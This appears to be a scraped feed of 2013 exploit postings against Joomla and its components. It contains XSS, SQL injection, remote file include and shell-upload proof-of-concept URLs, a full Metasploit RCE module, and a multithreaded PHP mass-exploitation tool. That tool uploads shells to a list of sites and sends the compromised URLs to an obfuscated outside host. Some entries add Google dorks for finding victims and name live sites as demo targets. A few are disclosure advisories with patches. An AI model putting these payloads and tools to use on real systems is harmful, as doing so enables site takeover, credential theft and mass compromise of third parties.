Joomla Incapsula Component <= 1.4.6_b Reflected Cross-Site Scripting Vulnerability
Vendor: Incapsula Inc.
Product web page: http://www.incapsula.com
Affected version: 1.4.6_b and bellow
Summary: Once installing the Incapsula for Joomla component, simply
make the provided DNS changes and within minutes your website traffic
will be seamlessly routed through Incapsula’s globally distributed
network of POPs.
Desc: The Joomla Incapsula component suffers from a XSS issue due
to a failure to properly sanitize user-supplied input to the 'token'
GET parameter in the 'Security.php' and 'Performance.php' scripts.
Attackers can exploit this weakness to execute arbitrary HTML and
script code in a user's browser session.
--------------------------------------------------------------------------
/administrator/components/com_incapsula/assets/tips/en/Performance.php:
-----------------------------------------------------------------------
22: <a href="https://my.incapsula.com/billing/selectplan?token=
<?php echo $_GET['token']; ?> target="_blank" class="IFJ_link">
Click here</a> to upgrade your account
Patch:
------
22: <a href="https://my.incapsula.com/billing/selectplan?token=
<?php echo htmlentities($_GET['token']); ?>" target="_blank"
class="IFJ_link">Click here</a> to upgrade your account
--------------------------------------------------------------------------
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.4
MySQL 5.5.25a
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience.mk
Advisory ID: ZSL-2013-5121
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5121.php
06.12.2012
--
http://localhost/administrator/components/com_incapsula/assets/tips/en/Security.php?token="><script>alert(document.cookie)</script>
http://localhost/administrator/components/com_incapsula/assets/tips/en/Performance.php?token="><script>alert(document.cookie)</script> |
↧
Joomla Incapsula 1.4.6_b Cross Site Scripting
↧
Joomla Collector Shell Upload
# Exploit Title:Joomla com_collecter shell upload # Author: Red Dragon_al (Alb0zZ Team) # Home :HackForums.AL,alb0zz.in # Date :19/01/2013 # Category:: web apps # Google dork: [inurl:index.php?option=com_collector] # Tested on: Windows XP # Download: http://www.steevo.fr/en/download # Home Page: http://www.steevo.fr/ --------------------------------------- # ~ Expl0itation ~ # --------------------------------------- 1- Google dork: [inurl:index.php?option=com_collector] 2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1 3- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1 upload ur shell as : shell.php # Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends. #2013 |
↧
↧
Joomla! 3.0.2 PHP Object Injection
-------------------------------------------------------------------
Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability
-------------------------------------------------------------------
[-] Software Link:
http://www.joomla.org/
[-] Affected Versions:
Version 3.0.2 and earlier 3.0.x versions.
Version 2.5.8 and earlier 2.5.x versions.
[-] Vulnerability Description:
The vulnerable code is located in /plugins/system/highlight/highlight.php:
56. // Get the terms to highlight from the request.
57. $terms = $input->request->get('highlight', null, 'base64');
58. $terms = $terms ? unserialize(base64_decode($terms)) : null;
User input passed through the "highlight" parameter is not properly sanitized before being used in
an unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the
application scope. Successful exploitation of this vulnerability doesn't require authentication,
but requires the "System Highlight" plugin to be enabled (such as by default configuration).
[-] Solution:
Upgrade to version 3.0.3 or 2.5.9.
[-] Disclosure Timeline:
[31/10/2012] - Vendor notified
[08/11/2012] - Vendor asked for a proof of concept
[08/11/2012] - Proof of concept provided to the vendor
[04/02/2013] - Vendor update released
[27/02/2013] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-1453 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-03 |
↧
Joomla RSfiles SQL Injection
******************************************************************************* # Title : Joomla Component RSfiles <= (cid) SQL injection Vulnerability # Author : ByEge # Contact : http://byege.blogspot.com # Date : 18.03.2013 # S.Page : http://www.rsjoomla.com # Dork : inurl:index.php?option=com_rsfiles # DorkEx : http://www.google.com.tr/#hl=tr&sclient=psy-ab&q=inurl:index.php?option=com_rsfiles Vulnerability : ?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- [[SQL Injection Test]]] http://server/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- ********************************* # Turkey. |
↧
Joomla Component JCE File Upload Remote Code Execution
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla Component JCE File Upload Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability in the JCE component for Joomla!, which
could allow an unauthenticated remote attacker to upload arbitrary files, caused by the
fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP
request, a remote attacker could exploit this vulnerability to upload a malicious PHP
script, which could allow the attacker to execute arbitrary PHP code on the vulnerable
system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla
1.5.26.
},
'Author' =>
[
'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC
'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['BID', '49338'],
['EDB', '17734']
],
'Payload' =>
{
'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
'DisableNops' => true,
'BadChars' => "#",
'Keys' => ['php']
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'Privileged' => false,
'DisclosureDate' => 'Aug 2 2012',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, "Joomla directory path", "/"])
], self.class)
end
def get_version
# check imgmanager version
@uri_base = normalize_uri(target_uri.path.to_s, 'index.php')
@vars_get_base = {
'option'=> 'com_jce',
'task' => 'plugin',
'plugin'=> 'imgmanager',
'file' => 'imgmanager'
}
print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
res = send_request_cgi({
'uri' => @uri_base,
'vars_get' => @vars_get_base,
'method' => 'GET',
'version' => '1.1'
})
version = nil
if (res and res.code == 200)
res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
version = $1.nil? ? nil : $1
end
return version
end
def check
version = ( get_version || '').to_s
if (version.match(%r{1\.5\.7\.1[0-4]?}))
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def upload_gif
# add GIF header
cmd_php = "GIF89aG\n<?php #{payload.encoded} ?>"
# Generate some random strings
@payload_name = rand_text_alpha_lower(6)
boundary = '-' * 27 + rand_text_numeric(11)
parms = {'method'=> 'form'}
parms.merge!(@vars_get_base)
# POST data
post_data = Rex::MIME::Message.new
post_data.bound = boundary
post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")
post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")
post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")
data = post_data.to_s
res = send_request_cgi({
'uri' => @uri_base,
'vars_get' => parms,
'method' => 'POST',
'version' => '1.1',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
if (res and res.code = 200 )
return :access_denied if (res.body =~ /RESTRICTED/i)
print_good("Successfully uploaded #{@payload_name}.gif")
else
print_error("Error uploading #{@payload_name}.gif")
return :abort
end
return :success
end
def renamed?
# Rename the file from .gif to .php
data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"
print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")
res = send_request_cgi(
{
'uri' => @uri_base,
'vars_get' => @vars_get_base,
'method' => 'POST',
'version' => '1.1',
'data' => data,
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8',
'headers' =>
{
'X-Request' => 'JSON'
}
})
if (res and res.code == 200 )
print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")
return true
else
print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")
return false
end
end
def call_payload
payload = "#{@payload_name}.php"
print_status("Calling payload: #{payload}")
uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'version' => '1.1'
})
end
def exploit
return if not check == Exploit::CheckCode::Vulnerable
if upload_gif == :success
if renamed?
register_files_for_cleanup("#{@payload_name}.php")
call_payload
end
end
end
end |
↧
↧
Joomla Janissaries Civicrm Shell Upload
<?php
/*
----------------------------------------------------------------------------
.__ .__
_____ |__|___.__._____ ____ | |__ __ __ ____ ____
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
\/ \/ \/ \/ \/ \//_____/
-----------------------------------------------------------------------------
* Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
* Coded by Miyachung
* Stay away from lamers o.O
* Contact: miyachung@hotmail.com
* Special Thanks : B127Y
* Site: http://janissaries.org
* Youtube Channel: http://www.youtube.com/user/JanissariesOrg
* Exploitation Video: http://www.youtube.com/watch?v=4mPibfS-RXM
* Coding date: 21.04.2013
* Usage : php exploit.php site_list upload_file searchkeyword
* Example: php exploit.php sites.txt shell.php searchkeyword
*/
set_time_limit(0);
ob_start();
class exploit
{
private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
private $post_url_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
private $filename;
private $url;
private $file_to_upload;
private $if_is_uploaded = "/Undefined variable: HTTP_RAW_POST_DATA/si";
private $thread_maxsize;
private $site_list;
private $file_regex;
private $save_file = "uploaded.txt";
private $user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
private $timeout_sec = 20;
private $token = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
private $idnum = 31;
public function __construct($site_list,$filename,$thread,$regex)
{
$this->site_list = file($site_list);
$this->filename = $filename;
$this->file_to_upload = file_get_contents($filename);
$this->thread_maxsize = $thread;
$this->url = base64_decode(base64_decode(base64_decode($this->token)));
$this->file_regex = "/$regex/";
echo "[+]Joomla Com_Civicrm Fucker with MultiThread\n";
echo "[+]Coded by Miyachung\n";
echo "[+]Stay away from lamers o.O\n";
echo "[+]Contact: miyachung@hotmail.com\n";
echo "[+]Special Thanks : B127Y\n";
echo "[+]Site: http://janissaries.org\n";
echo "##################################################\n";
echo "[+]Total urls to try: ".count($this->site_list)."\n";
echo "[+]File to upload: ".$this->filename."\n";
echo "[+]Maximum Thread: ".$this->thread_maxsize."\n";
echo "[+]Search Keyword: ".$regex."\n\n";
ob_flush();
flush();
$this->miyachung();
}
private function miyachung()
{
$multi = curl_multi_init();
$count = 0;
foreach(array_chunk($this->site_list,$this->thread_maxsize) as $urls)
{
foreach($urls as $i => $url)
{
$curl[$i] = curl_init();
curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl[$i], CURLOPT_URL, trim($url).$this->post_url_path.$this->filename);
curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec);
curl_setopt($curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload);
curl_setopt($curl[$i], CURLOPT_USERAGENT,$this->user_agent);
curl_setopt($curl[$i], CURLOPT_HTTPHEADER,array('Content-Type: text/plain'));
curl_multi_add_handle($multi,$curl[$i]);
}
do
{
curl_multi_exec($multi,$active);
}
while($active > 0);
foreach($curl as $id => $content)
{
$conn[$id] = curl_multi_getcontent($content);
curl_multi_remove_handle($multi,$content);
if(!preg_match($this->if_is_uploaded,$conn[$id]) && preg_match('#/tmp-upload-images/'.$this->filename.'#',$conn[$id]))
{
$count++;
$check_it = $this->get(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
if($check_it && preg_match($this->file_regex,$check_it))
{
if($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55")
{
$this->post(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
}
else
{
exit("[-]Somethings has changed in tool! o.O!");
}
echo "###########################################################\n";
echo "[!]Exploitation Successfullll!\n";
printf("[%s]%s\n",$count,trim($urls[$id]));
echo "###########################################################\n";
ob_flush();
flush();
$this->save(trim($urls[$id]).$this->uploaded_file_path.$this->filename,$count);
}
else
{
printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
ob_flush();
flush();
}
}
else
{
$count++;
printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
ob_flush();
flush();
}
}
}
}
private function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT,$this->timeout_sec);
$data= curl_exec($ch);
curl_close($ch);
return $data;
}
private function post($url)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$this->url);
curl_setopt($curl,CURLOPT_POSTFIELDS,"url=".$url);
$exec = curl_exec($curl);
curl_close($curl);
return $exec;
}
private function save($url,$count)
{
$file = fopen($this->save_file,'ab');
fwrite($file,"#########################################################################\n");
fwrite($file,"[!]Exploitation Successfullll!\n");
fwrite($file,"[$count]$url\n");
fclose($file);
return true;
}
}
if($argv[1] && $argv[2] && $argv[3] && $argv[4])
{
$exploit = new exploit($argv[1],$argv[2],$argv[3],$argv[4]);
}
else
{
print
"
----------------------------------------------------------------------------
.__ .__
_____ |__|___.__._____ ____ | |__ __ __ ____ ____
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
\/ \/ \/ \/ \/ \//_____/
-----------------------------------------------------------------------------
* Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
* Coded by Miyachung
* Stay away from lamers o.O
* Contact: miyachung@hotmail.com
* Special Thanks : B127Y
* Site: http://janissaries.org
* Youtube Channel: http://www.youtube.com/user/JanissariesOrg
* Coding date: 21.04.2013
* Usage : php exploit.php site_list upload_file maxthread searchkeyword
* Example: php exploit.php sites.txt shell.php 10 searchkeyword
";
}
?> |
↧
Joomla! 3.0.3 PHP Object Injection
------------------------------------------------------------------
Joomla! <= 3.0.3 (remember.php) PHP Object Injection Vulnerability
------------------------------------------------------------------
[-] Software Link:
http://www.joomla.org/
[-] Affected Versions:
Version 3.0.3 and earlier 3.0.x versions.
Version 2.5.9 and earlier 2.5.x versions.
[-] Vulnerability Description:
The vulnerable code is located in /plugins/system/remember/remember.php:
34. $hash = JApplication::getHash('JLOGIN_REMEMBER');
35.
36. if ($str = JRequest::getString($hash, '', 'cookie', JREQUEST_ALLOWRAW | JREQUEST_NOTRIM))
37. {
38. // Create the encryption key, apply extra hardening using the user agent string.
39. // Since we're decoding, no UA validity check is required.
40. $privateKey = JApplication::getHash(@$_SERVER['HTTP_USER_AGENT']);
41.
42. $key = new JCryptKey('simple', $privateKey, $privateKey);
43. $crypt = new JCrypt(new JCryptCipherSimple, $key);
44. $str = $crypt->decrypt($str);
45. $cookieData = @unserialize($str);
User input passed through cookies is not properly sanitized before being used in an unserialize()
call at line 45. This could be exploited to inject arbitrary PHP objects into the application scope.
Successful exploitation of this vulnerability requires authentication because the attacker needs
to know the "hash string" used to read the cookie parameter at line 36.
[-] Solution:
Upgrade to version 2.5.10, 3.0.4 or 3.1.0.
[-] Disclosure Timeline:
[04/12/2012] - Vendor alerted for a possible vulnerability
[13/02/2013] - Vulnerability confirmed and proof of concept sent to the vendor
[24/04/2013] - Vendor update released
[26/04/2013] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-3242 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-04 |
↧
Joomla DJ Classifieds Extension 2.0 SQL Injection
# Exploit Title: Joomla - DJ Classifieds - Time-Based Blind SQL Injection # Google Dork: inurl:"index.php/dj-classifieds/" or inurl:"/dj-classifieds/" # Date: 4/5/2013 # Exploit Author: Napsterakos # Vendor Homepage: http://design-joomla.eu # Software Link: - # Version: 2.0 # Tested on: Linux Link: http://server/joomla/index.php/dj-classifieds/ Exploit: http://server/joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=[SQLi] # Exploit-DB Note: # dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=0 # dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=1 Credits to: Greek Hacking Scene |
↧
Joomla Phocagallery 3.0.0 / 4.0.0 Cross Site Scripting
# Exploit Title: Joomla com_phocagallery Plupload Flash XSS
# Release Date: 13/05/2013
# Author: Rafay Baloch And Deepankar Arora
# Contact: http://rafayhackingarticles.net
# Vendor: phoca.cz
# Versions Affected: 3.0.0 - 4.0.0
# Google Dork: inurl:com_phocagallery
Description:
The vulnerability with plupload with a known vulnerability, however
com_phocagallery uses it, The id parameter is not sanitized. Therefore it
results in a flash based xss.
The vulnerable code is as follows:
this.id = this.stage.loaderInfo.parameters["id"];
As you can see that there is not type of filtering being performed at the
id parameter.
POC:
http://localhost/joomla/components/com_phocagallery/assets/plupload/plupload.flash.swf?id=0\%22))}catch(e){if(!window.x){window.x=1;alert(2)}}//
Fix:
Sanitize the input.
this.id =
(this.stage.loaderInfo.parameters["id"]).toString().replace(/[^\w]/g, '');
The above would filter out all the special characters.
References:
https://github.com/moxiecode/plupload/commit/2d746ee
--
Warm Regards,
Rafay Baloch
http://rafayhackingarticles.net
http://techlotips.com |
↧
↧
Joomla Jnews 8.0.1 Cross Site Scripting
# Exploit Title: Joomla com_jnews Open Flash-Chart XSS
# Release Date: 14/05/2013
# Author: Deepankar Arora And Rafay Baloch
# Blog: http://rafayhackingarticles.net
# Vendor: www.joobi.co
# Versions Affected: 8.0.1(latest) and earlier
# Google Dork: inurl:com_jnews
Description:
The vulnerability with Open-Flash Chart is a known vulnerability, however
it is integrated with com_jnews, The get-data parameter is not sanitized.
Therefore it results in a flash based cross-site scripting.
The vulnerable code is as follows:
var _local2 = open_flash_chart_data ";
if (this.chart_parameters ["get-data"]) {
_local2 = this.chart_parameters ["get-Data"];
};
if (this.chart_parameters ["id"]) {
_local3 = this.callExternalCallback (_local2
this.chart_parameters ["id"]);
} else {
_local3 = this.callExternalCallback (_local2);
};
We can see from the code that when called, get-data parameter is directly
passed to _local2 without proper sanitization.
POC:
http://localhost/joomla/components/com_jnews/includes/openflashchart/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})()
Fix:
Sanitize the input.
_local2 = (this.chart_parameters ["get-Data"]).toString().replace(/[^\w]/g,
'');
The above would filter out all the special characters.
References:
http://www.wooyun.org/bugs/wooyun-2010-07265 |
↧
Joomla x-shop
Title : Joomla x-shop <= 1.7 Remote File Include Vulnerability -------------------------------------------------------------------------------- #Author: Crackers_Child #cont@ct: crackers_child@sibersavascilar.com -------------------------------------------------------------------------------- Google Dorks : allinurl:"/com_x-shop/" ------------------------- ------------------------------------------------------- Download : http://mamboxchange.com/frs/?group_id=187&release_id=1047 -------------------------------------------------------------------------------- Bug in admin.x-shop.php <? include($mosConfig_absolute_path.'/administrator/components/com_x-shop/languages/'.$mosConfig_lang.'.php'); session_start(); -------------------------------------------------------------------------------- Exploit: http://www.site.com/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=Shell.txt? -------------------------------------------------------------------------------- greets: All My Friends And SiberSavascilar.Com Members ! -------------------------------------------------------------------------------- --------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] -------------------------------------- |
↧
Joomla Component com_s5clanroster Sql Injection Vulnerability
Joomla Component com_s5clanroster Sql Injection Vulnerability ============================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Dork : inurl:"com_s5clanroster" .:. Script : http://www.newone.org/s5-clan-roster-shape5-extensions #################################################################### ===[ Exploit ]=== Sql Injection: ============== www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql] www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users-- - #################################################################### # BB720E99B11BBA96 1337day.com [2013-05-17] B1254A136A7E866F # |
↧
Joomla Discussions SQL Injection
# Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability # Author : Red Security TEAM # Date : 17/01/2012 # Risk : High # Software : http://extensions.joomla.org/extensions/communication/forum/13560 # Tested On : CentOS # Contact : Info [ 4t ] RedSecurity [ d0t ] COM # Home : http://RedSecurity.COM # # Exploit : # http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=[SQLi] # # Example : # # 1. [Get Database Name] # http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a # 2. [Get Tables Name] # http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F7574706F7374715F6F65646576)--+a # 3. [Get Username] # http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.username as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a # 4. [Get Password] # http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.password as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a # |
↧
↧
Joomla Cryptography Weakness
# Vulnerable Application
All current and past versions of Joomla (http://www.joomla.org) up to
1.5.26, 2.5.11, 3.1.1. Also the Joomla platform and maybe the Joomla
framework (not tested). At the moment there is no vendor patch available.
# The Problem
The problem occurs in the implementation of JCryptCipherSimple. The
JCryptCipherSimple encrypts a text with an simple XOR operation in the
Electronic Codebook Mode (ECB). The ECB is insecure by design and
normally just used for education purposes because of its simplicity.
For the encryption, the plaintext is split into small blocks and
encrypted block by block. Each block has the same length as the key.
The mathematical equation for the encryption is:
Ciphertext = Plaintext XOR Key
If the ciphertext and at least one block of the plaintext is known, it
is thus very easy to calculate the key. To calculate the key, the
equation could be rearranged as follows:
Key = Ciphertext XOR Plaintext
So, if an attacker knows the plaintext corresponding to one block
ciphertext, he is able to calculate the key and thus to decrypt the
complete ciphertext.
# An example in the Joomla core
In the Joomla core the JCryptCipherSimple is used for the "remember
me" function. There the serialized user credentials are encrypted with
the JCryptCipherSimple. The serialized credentials look for example
like this:
a:2:{s:8:"username";s:12:"the_username";s:8:"password";s:12:"the_password";}
The used key is 32 characters long. The first block to encrypt is thus:
a:2:{s:8:"username";s:12:"the_us
So the attacker must only know the beginning of the username of the
victim to calculate the key and decrypt the second and third block
(including the password of the victim).
# Exploit the core vulnerability
To exploit the vulnerability it is necessary to steal the "remember
me" cookie of an user. This is for example possible through an XSS
vulnerability.
Then the key could be calculated with the script below. The script is
written for the Joomla Platform 12.3. The used functions are identical
with these used in the current versions of the CMS. To calculate the
key it is necessary to set the variables $plaintext (known part of the
credentials) and $ciphertext (content of the remember me cookie) and
then execute the script. Maybe it is also necessary to adjust the path
to the needed library files.
# The exploit script
require '../libraries/import.php';
require_once '../libraries/legacy/application/application.php';
class CalculateKey extends JApplicationCli {
public function execute() {
$plaintext = ''; // first part of serialized credentials
$cyphertext = ''; // content of remember me cookie
$key = new JCryptKey('simple', $plaintext, $plaintext);
$crypt = new JCrypt(new JCryptCipherSimple, $key);
$out = $crypt->decrypt($cyphertext);
$out = substr($out, 0, 32);
$this->out($out);
}
}
JApplicationCli::getInstance('CalculateKey')->execute();
# What else?
The JCryptCipherSimple may also be used by third party developers in
their Joomla extensions, so there is an unknown number of vulnerable
extensions.
# Solution
A solution to the problem would be to rewrite the JCryptCipherSimple
to be non-deterministic. This could be achieved by using another mode
of operation. An alternative is to use another by the Joomla core
provided cipher and remove the JCryptCipherSimple.
# History
2013.05.11 Vulnerability reported to the vendor
2013.05.12 Vendor asked for details
2013.05.12 Details and exploit provided to the vendor
2013.05.30 Asked vendor about the status of investigation (no response)
2013.06.11 Sent another mail to the vendor (no response)
2013.06.15 Full disclosure
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.19 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
↧
Joomla Rokdownloads Shell Upload
#################################
# ISlamic Republic Of Iran Security Team
# Www.IrIsT.Ir
#################################
# Exploit Title : joomla com_rokdownloads Components shell upload Vulnerability
# Author : IrIsT Security & Researcher Team
# Discovered By : Am!r
# Home : http://IrIsT.Ir - http://IrIsT.Ir/forum
# Facebook Page : http://www.facebook.com/pages/IrIsT-Hacking-Security-Researcher-Group/488307267857573
# Software Link : http://www.joomla.org
# Security Risk : High
# Tested on : Linux
# Dork : inurl:administrator/components/com_rokdownloads
#################################
Exploit :
Post.php
<?php
$uploadfile="Amir.php.gif";
$ch =
curl_init("http://www.exemple.com/administrator/components/com_rokdownloads/assets/uploadhandler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/images/stories/Amir.php.gif
#################################
# Greats : B3HZ4D - C0dex - TaK.FaNaR - F@rid - Beni_Vanda - dr.koderz - Mr Zer0 - Smartprogrammer - z3r0
# sajjad13and11 - silent - Bl4ck M4n - AHAAD - ARTA - Dj.TiniVini - E2MA3N - Immortal Boy - IR Anonymous
# Mikili - Mr.F@RDIN - Net.W0lf - skote_vahshat - Net.W0lf - MedRiK - 4xp3r-bh - Sokout - mehdiv
# & All Members In IrIsT.Ir
#################################
#Tnx To : PacketstormSecurity.Org - Cxsecurity.Com - 1337day.com - exploit-db.com
################################# |
↧
Joomla Attachments Shell Upload
####################################################################################################### # Exploit Title: Joomla Com_Attachments Component Arbitrary File Upload Vulnerability # Google Dork: inurl:"index.php?option=com_attachments" # Date: 2013-07-09 # Exploit Author: Stars Hacking Team # We Are: S3Ri0uS , Satanic2000 , NuLLeRRoR , Mohamadpk , blackc0der # Email: Z3ro.Day@Hotmail.Com , Ste4ler_Mind@Yahoo.Com , Mr.Satanic2000@Rogers.Com # Vendor Homepage: http://joomla.org # Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/downloads/3115 # Tested on: Lin ####################################################################################################### # ~> ExpLoit <~ # # http://target/index.php?option=com_attachments&task=upload # # 1. Upload Your File . ! # 2. Find Your File in This Path: # http://target/attachments/article # 3. End :P # ######################################################################################################## # ~> DeMo <~ # http://www.iwalkforlife.com/index.php?option=com_attachments&task=upload # http://www.iwalkforlife.com/attachments/article/0/stars.jpg # ---- # http://www.lgbtpsychology2013.com/index.php/en/?option=com_attachments&task=upload # http://www.sailors-club.net/index.php?option=com_attachments&task=upload # http://www.project-establis.eu/index.php?option=com_attachments&task=upload ######################################################################################################## # Spt : Pejv4k , Skitt3r , Netw0rm , HUrr!c4nE , Kinglet , Skipp3r , AG , Amo Vahid , Ahmadbady , XzadX # iskorpitx , HellBoy , Cyber-Terrorist And All My Best Friend :X # Fuck All Lammer in Cyber :P ######################################################################################################## |
↧
Joomla Googlemaps 3.2 Cross Site Scripting / Denial Of Service
Earlier I wrote about multiple vulnerabilities in Googlemaps plugin for Joomla (http://securityvulns.ru/docs29645.html). After my informing, the developer fixed these vulnerabilities in versions 2.19 and 3.1 of the plugin - by removing proxy functionality. And in version 3.2 of the plugin he introduced new proxy functionality, which must be protected against previous attacks. But after my checking, I've found two holes in the last version of the plugin. These are Denial of Service and Cross-Site Scripting vulnerabilities in Googlemaps plugin for Joomla. ------------------------- Affected products: ------------------------- Vulnerable is Googlemaps plugin v3.2 for Joomla. I've informed the developer about these holes. Now he is working on a new version. ------------------------- Affected vendors: ------------------------- Mike Reumer http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147 ---------- Details: ---------- To bypass protection for accessing this script it's needed to set referer, cookie and token. The referer is current site, the cookie is set by the site (Joomla) itself and the token can be found at page which uses plugin of the site (and it's setting in URL). This data can be taken from the site automatically. Referer: http://site Cookie: dc9023a0ff4f8a00f9b2f4e7600c17f4=69c59f0263b70f9343e0a75a93bd44a0 Denial of Service (WASC-10): 